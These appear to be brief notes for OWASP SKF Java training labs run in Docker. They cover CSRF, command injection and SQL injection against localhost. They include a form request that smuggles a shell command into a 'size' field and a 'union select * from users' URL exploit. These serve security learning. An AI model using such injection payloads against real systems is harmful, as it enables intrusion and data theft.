32 lines
936 B
Markdown
32 lines
936 B
Markdown
## blabla1337/owasp-skf-lab:java-csrf
|
|
|
|
```bash
|
|
docker run -p5000:5000 blabla1337/owasp-skf-lab:java-csrf
|
|
```
|
|
|
|
spring-boot
|
|
-> admin/admin -> src/main/resources/data.sql
|
|
|
|
|
|
```bash
|
|
curl 'http://localhost:5000/update' \
|
|
-H 'Content-Type: application/x-www-form-urlencoded' \
|
|
-H 'Cookie: JSESSIONID=DA8353D048C3C8B90D33596A10B2B360' \
|
|
--data-raw 'color=yellow2'
|
|
```
|
|
|
|
## blabla1337/owasp-skf-lab:java-cmd
|
|
|
|
docker run -p5000:5000 blabla1337/owasp-skf-lab:java-cmd
|
|
|
|
drop malicious payload in remote filesystem
|
|
```bash
|
|
curl 'http://localhost:5000/home' \
|
|
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \
|
|
--data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \
|
|
```
|
|
|
|
## owasp-skf-lab:java-sqli
|
|
|
|
exploit
|
|
`http://localhost:5000/home/1%20union%20select%20*%20from%20users`
|